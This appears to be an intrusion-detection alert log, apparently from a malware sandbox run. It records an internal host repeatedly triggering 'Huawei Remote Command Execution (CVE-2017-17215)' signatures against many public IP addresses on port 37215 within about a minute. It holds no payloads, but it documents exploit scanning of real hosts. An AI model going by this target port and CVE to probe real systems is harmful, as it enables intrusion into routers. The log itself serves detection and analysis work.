                                            06/14/24-10:43:39.790831TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4117237215192.168.2.14156.114.209.67
                                            06/14/24-10:44:02.383409TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5203637215192.168.2.1441.29.8.241
                                            06/14/24-10:43:58.290546TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4912437215192.168.2.1441.229.168.45
                                            06/14/24-10:44:24.914560TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3865437215192.168.2.14156.116.180.67
                                            06/14/24-10:44:33.133860TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5566237215192.168.2.14156.158.185.220
                                            06/14/24-10:44:29.024217TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5276637215192.168.2.14197.62.242.90
                                            06/14/24-10:43:41.850484TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3374837215192.168.2.14197.94.33.146
                                            06/14/24-10:43:58.273644TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4868637215192.168.2.14156.247.144.62
                                            06/14/24-10:43:54.198276TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3997237215192.168.2.1441.22.57.228
                                            06/14/24-10:44:18.761431TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3850637215192.168.2.1441.189.9.187
                                            06/14/24-10:44:35.180154TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4564037215192.168.2.14197.23.250.12
                                            06/14/24-10:44:16.733071TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5800837215192.168.2.14156.1.6.130
                                            06/14/24-10:44:26.978817TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5434637215192.168.2.14156.108.186.12
                                            06/14/24-10:44:06.453815TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4184037215192.168.2.1441.174.39.105
                                            06/14/24-10:44:12.641728TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3369037215192.168.2.14156.85.116.40
                                            06/14/24-10:43:43.943760TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4463837215192.168.2.14156.187.168.199
                                            06/14/24-10:44:16.716546TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4155437215192.168.2.14197.114.216.128
                                            06/14/24-10:44:02.368389TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4666237215192.168.2.1441.150.186.50
                                            06/14/24-10:43:56.244334TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5356237215192.168.2.1441.95.200.201
                                            06/14/24-10:44:04.419898TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3661037215192.168.2.14156.35.47.92
                                            06/14/24-10:43:39.812760TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5926637215192.168.2.14156.91.246.73
                                            06/14/24-10:44:18.761460TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3889037215192.168.2.1441.36.124.159
                                            06/14/24-10:44:22.861960TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5483837215192.168.2.1441.185.35.136
                                            06/14/24-10:44:14.671500TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5215637215192.168.2.14197.207.166.240
                                            06/14/24-10:43:58.276547TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5355237215192.168.2.1441.227.41.53
                                            06/14/24-10:44:10.546274TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3922037215192.168.2.14156.33.111.195
                                            06/14/24-10:44:14.682653TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3570237215192.168.2.14197.89.71.178
                                            06/14/24-10:44:06.452117TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4729637215192.168.2.1441.105.233.32
                                            06/14/24-10:44:12.617257TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5152037215192.168.2.14156.76.234.29
                                            06/14/24-10:44:31.094401TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5927037215192.168.2.14156.73.60.62
                                            06/14/24-10:43:56.229661TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4535637215192.168.2.14156.5.187.229
                                            06/14/24-10:44:35.181397TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4512837215192.168.2.14197.205.34.6
                                            06/14/24-10:43:39.790404TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4324837215192.168.2.14156.34.85.8
                                            06/14/24-10:44:26.986276TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5961237215192.168.2.14197.34.37.201
                                            06/14/24-10:43:36.703408TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5300237215192.168.2.14197.19.81.151
                                            06/14/24-10:43:43.940243TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4017037215192.168.2.14197.130.251.172
                                            06/14/24-10:44:22.862446TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5811037215192.168.2.1441.250.209.47
                                            06/14/24-10:44:06.472830TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3774637215192.168.2.1441.221.133.107
                                            06/14/24-10:44:10.546675TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4444237215192.168.2.1441.24.152.247
                                            06/14/24-10:44:10.582132TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4601237215192.168.2.14197.31.195.156
                                            06/14/24-10:44:12.615099TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4861237215192.168.2.1441.68.29.112
                                            06/14/24-10:43:56.244805TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5324037215192.168.2.14197.145.124.202
                                            06/14/24-10:44:16.718726TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3337637215192.168.2.14156.19.249.38
                                            06/14/24-10:43:43.941916TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6056837215192.168.2.14156.174.86.73
                                            06/14/24-10:43:43.942969TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5033237215192.168.2.14197.0.213.120
                                            06/14/24-10:44:02.364923TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3455037215192.168.2.14197.245.161.106
                                            06/14/24-10:43:50.074962TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4205837215192.168.2.14156.86.219.251
                                            06/14/24-10:44:10.564691TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5236237215192.168.2.1441.162.1.30
                                            06/14/24-10:43:56.253562TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4408837215192.168.2.14197.206.114.167
                                            06/14/24-10:44:14.681352TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3755837215192.168.2.14156.202.109.29
                                            06/14/24-10:43:58.276249TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5170037215192.168.2.14156.62.231.171
                                            06/14/24-10:44:29.011222TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6040837215192.168.2.1441.186.163.178
                                            06/14/24-10:44:33.149452TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3843037215192.168.2.1441.171.59.80
                                            06/14/24-10:43:43.971337TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5377837215192.168.2.1441.128.113.63
                                            06/14/24-10:43:50.068405TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5764837215192.168.2.14197.189.215.128
                                            06/14/24-10:44:20.803939TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4756637215192.168.2.1441.71.133.110
                                            06/14/24-10:43:48.030612TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4750037215192.168.2.14197.7.133.147
                                            06/14/24-10:44:22.879223TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5403837215192.168.2.1441.225.185.122
                                            06/14/24-10:44:00.334735TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5016837215192.168.2.14156.234.179.36
                                            06/14/24-10:43:50.073668TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4216637215192.168.2.14156.162.246.59
                                            06/14/24-10:43:41.849376TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5822837215192.168.2.1441.230.212.237
                                            06/14/24-10:44:08.520285TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4958837215192.168.2.14197.43.99.88
                                            06/14/24-10:44:26.998238TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4609637215192.168.2.14197.153.240.160
                                            06/14/24-10:44:10.548750TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3554037215192.168.2.14156.29.198.8
                                            06/14/24-10:44:31.052582TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5901637215192.168.2.14156.246.10.170
                                            06/14/24-10:44:20.827708TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4764437215192.168.2.14197.46.58.250
                                            06/14/24-10:44:04.411968TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5879437215192.168.2.14156.174.112.4
                                            06/14/24-10:44:02.383172TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4873837215192.168.2.14156.66.98.99
                                            06/14/24-10:44:18.763136TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3413037215192.168.2.14197.111.143.77
                                            06/14/24-10:43:52.150571TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3439637215192.168.2.14156.137.250.238
                                            06/14/24-10:44:02.368106TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5523837215192.168.2.14156.83.234.195
                                            06/14/24-10:43:34.678461TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5413037215192.168.2.14197.86.144.0
                                            06/14/24-10:44:20.829980TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5550637215192.168.2.14156.99.139.110
                                            06/14/24-10:44:02.369013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3564437215192.168.2.14156.45.109.231
                                            06/14/24-10:44:10.562973TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3951037215192.168.2.14197.147.239.48
                                            06/14/24-10:43:48.033716TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5498437215192.168.2.14156.98.140.158
                                            06/14/24-10:44:18.761229TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4038237215192.168.2.1441.155.219.224
                                            06/14/24-10:44:02.366215TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5601437215192.168.2.14197.34.133.22
                                            06/14/24-10:43:56.253474TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5818237215192.168.2.14156.82.226.34
                                            06/14/24-10:44:22.861346TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4235837215192.168.2.14156.241.79.74
                                            06/14/24-10:44:04.408080TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3578037215192.168.2.14197.88.100.124
                                            06/14/24-10:43:45.968582TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3912837215192.168.2.14197.84.82.88
                                            06/14/24-10:44:00.338264TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5055037215192.168.2.14197.0.42.215
                                            06/14/24-10:44:20.830238TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3710237215192.168.2.14156.181.228.135
                                            06/14/24-10:43:34.678640TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4903237215192.168.2.14197.255.122.101
                                            06/14/24-10:44:02.367516TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3315237215192.168.2.14156.245.238.101
                                            06/14/24-10:43:36.717180TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4557237215192.168.2.14156.33.122.105
                                            06/14/24-10:43:52.143496TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3774837215192.168.2.14156.250.9.154
                                            06/14/24-10:44:12.643021TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4832837215192.168.2.14156.104.71.218
                                            06/14/24-10:43:48.015359TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4054837215192.168.2.14156.133.207.188
                                            06/14/24-10:44:26.977571TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4288237215192.168.2.14156.247.55.156
                                            06/14/24-10:43:34.660562TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5145637215192.168.2.1441.78.102.254
                                            06/14/24-10:43:54.182848TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4133237215192.168.2.14156.119.170.236
                                            06/14/24-10:44:00.326535TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3440237215192.168.2.1441.73.211.130
                                            06/14/24-10:44:12.616385TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4802037215192.168.2.14156.70.51.110
                                            06/14/24-10:44:14.670346TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5658437215192.168.2.14197.123.242.46
                                            06/14/24-10:43:39.808433TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3429437215192.168.2.14156.176.116.187
                                            06/14/24-10:43:39.808077TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5974637215192.168.2.14156.165.119.187
                                            06/14/24-10:44:14.689653TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3493237215192.168.2.1441.107.54.122
                                            06/14/24-10:43:45.967858TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3301037215192.168.2.14197.174.167.252
                                            06/14/24-10:43:34.661477TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5092037215192.168.2.1441.156.92.120
                                            06/14/24-10:44:20.806313TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5079837215192.168.2.1441.202.123.168
                                            06/14/24-10:44:22.862478TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3940037215192.168.2.1441.115.65.108
                                            06/14/24-10:43:56.229586TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5176837215192.168.2.14156.132.222.45
                                            06/14/24-10:44:35.183064TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3332237215192.168.2.14197.137.85.160
                                            06/14/24-10:43:52.143443TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4739237215192.168.2.14197.181.74.132
                                            06/14/24-10:44:33.149610TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4990437215192.168.2.14197.33.132.84
                                            06/14/24-10:43:52.147057TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5394437215192.168.2.14197.36.131.217
                                            06/14/24-10:44:12.618059TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5366837215192.168.2.1441.188.114.222
                                            06/14/24-10:44:16.718674TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3618837215192.168.2.14197.255.249.229
                                            06/14/24-10:43:50.071484TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5316437215192.168.2.1441.230.221.198
                                            06/14/24-10:44:16.737899TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4850837215192.168.2.14197.58.204.6
                                            06/14/24-10:44:29.027813TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5214837215192.168.2.1441.84.168.240
                                            06/14/24-10:43:48.021637TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5386437215192.168.2.14197.101.235.135
                                            06/14/24-10:43:50.074096TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5329437215192.168.2.14156.211.104.77
                                            06/14/24-10:44:18.776589TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4484237215192.168.2.14156.231.210.164
                                            06/14/24-10:44:33.152600TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5339237215192.168.2.14156.225.101.230
                                            06/14/24-10:44:29.011823TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5802437215192.168.2.14156.81.164.44
                                            06/14/24-10:44:10.549174TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4144037215192.168.2.1441.179.195.110
                                            06/14/24-10:44:26.979891TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4462637215192.168.2.1441.188.242.86
                                            06/14/24-10:44:29.022683TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3622037215192.168.2.1441.155.29.42
                                            06/14/24-10:44:02.366730TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5255637215192.168.2.14156.142.39.255
                                            06/14/24-10:43:45.967422TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3758237215192.168.2.14156.67.186.54
                                            06/14/24-10:43:56.230617TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4674037215192.168.2.14156.27.83.39
                                            06/14/24-10:44:24.946968TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3817237215192.168.2.14156.239.241.78
                                            06/14/24-10:44:35.182731TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4214637215192.168.2.14197.249.136.90
                                            06/14/24-10:43:58.277267TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3590037215192.168.2.14197.151.0.52
                                            06/14/24-10:43:39.807694TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4597237215192.168.2.14197.150.130.171
                                            06/14/24-10:43:50.075114TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5633237215192.168.2.1441.151.183.207
                                            06/14/24-10:44:12.645839TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4683437215192.168.2.14156.139.157.120
                                            06/14/24-10:44:18.760963TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5304237215192.168.2.14156.21.36.8
                                            06/14/24-10:43:37.762865TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4429237215192.168.2.14156.64.225.131
                                            06/14/24-10:43:34.674905TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4650437215192.168.2.14197.2.165.202
                                            06/14/24-10:44:02.366028TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5109037215192.168.2.1441.233.223.164
                                            06/14/24-10:43:48.032989TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3681237215192.168.2.14197.123.149.120
                                            06/14/24-10:44:31.089916TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5797837215192.168.2.14197.217.139.217
                                            06/14/24-10:43:36.725588TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3851637215192.168.2.1441.129.23.81
                                            06/14/24-10:44:04.410905TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4639237215192.168.2.14156.47.158.255
                                            06/14/24-10:43:36.725096TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3404037215192.168.2.14156.46.188.127
                                            06/14/24-10:44:04.411448TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4491037215192.168.2.14156.73.126.132
                                            06/14/24-10:44:08.517590TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5473237215192.168.2.1441.236.216.31
                                            06/14/24-10:44:06.451159TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3468837215192.168.2.14197.216.171.94
                                            06/14/24-10:44:18.763193TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3941837215192.168.2.14197.173.53.125
                                            06/14/24-10:43:43.942875TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6003437215192.168.2.14156.175.131.32
                                            06/14/24-10:44:33.152579TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4146637215192.168.2.14156.216.253.197
                                            06/14/24-10:44:10.565309TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4853237215192.168.2.1441.113.14.81
                                            06/14/24-10:44:35.176938TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4608237215192.168.2.1441.52.206.60
                                            06/14/24-10:44:26.985769TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3310437215192.168.2.1441.112.53.101
                                            06/14/24-10:44:10.542917TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6052437215192.168.2.14197.20.57.237
                                            06/14/24-10:43:50.071429TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3863637215192.168.2.14197.1.99.204
                                            06/14/24-10:44:26.977199TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5510037215192.168.2.1441.25.91.81
                                            06/14/24-10:44:33.148758TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5935837215192.168.2.1441.71.149.1
                                            06/14/24-10:44:02.368891TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4832237215192.168.2.1441.194.29.220
                                            06/14/24-10:43:54.185384TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5061637215192.168.2.14156.225.72.148
                                            06/14/24-10:44:26.986238TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4736437215192.168.2.14156.212.131.71
                                            06/14/24-10:44:18.762282TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5297037215192.168.2.14156.169.183.203
                                            06/14/24-10:44:35.179418TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4118037215192.168.2.14156.22.118.195
                                            06/14/24-10:43:43.944241TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5534037215192.168.2.1441.99.241.90
                                            06/14/24-10:44:33.149906TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4867237215192.168.2.14156.101.80.131
                                            06/14/24-10:44:00.344411TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3751637215192.168.2.14197.176.156.161
                                            06/14/24-10:43:39.807758TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5510837215192.168.2.14197.54.143.119
                                            06/14/24-10:43:36.705144TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3507037215192.168.2.14197.239.56.251
                                            06/14/24-10:43:43.943569TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5325237215192.168.2.14197.242.59.220
                                            06/14/24-10:44:29.013264TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5169837215192.168.2.1441.168.43.183
                                            06/14/24-10:43:58.273410TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4887037215192.168.2.14156.7.224.98
                                            06/14/24-10:43:45.967393TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4994037215192.168.2.1441.76.85.193
                                            06/14/24-10:43:41.848203TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4253637215192.168.2.1441.216.89.149
                                            06/14/24-10:44:14.670838TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5039437215192.168.2.1441.152.168.162
                                            06/14/24-10:44:08.503222TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6089837215192.168.2.14156.47.223.225
                                            06/14/24-10:44:08.501668TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5745237215192.168.2.14156.78.119.149
                                            06/14/24-10:44:20.830946TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4201837215192.168.2.14156.105.143.62
                                            06/14/24-10:43:37.759726TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3559237215192.168.2.1441.71.211.23
                                            06/14/24-10:44:10.564764TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4934037215192.168.2.1441.138.108.243
                                            06/14/24-10:43:41.848161TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4226837215192.168.2.1441.5.179.179
                                            06/14/24-10:44:08.519770TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5157237215192.168.2.1441.12.211.121
                                            06/14/24-10:44:20.829898TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5875837215192.168.2.1441.153.30.107
                                            06/14/24-10:43:41.897141TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4961837215192.168.2.14156.178.68.22
                                            06/14/24-10:44:08.504537TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4799837215192.168.2.14197.170.50.224
                                            06/14/24-10:44:10.569487TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4829237215192.168.2.1441.4.79.11
                                            06/14/24-10:44:29.022414TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5250237215192.168.2.14156.198.86.176
                                            06/14/24-10:43:45.968868TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5903437215192.168.2.1441.118.102.7
                                            06/14/24-10:43:58.276827TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4779637215192.168.2.14156.85.220.235
                                            06/14/24-10:43:50.112251TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5813437215192.168.2.14156.246.211.240
                                            06/14/24-10:44:29.014117TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4959437215192.168.2.1441.164.194.70
                                            06/14/24-10:44:29.028042TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5635637215192.168.2.14156.252.132.192
                                            06/14/24-10:43:50.112159TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4248037215192.168.2.14156.207.89.240
                                            06/14/24-10:44:16.717884TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5978437215192.168.2.1441.3.216.245
                                            06/14/24-10:43:41.847881TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3607237215192.168.2.14197.245.52.8
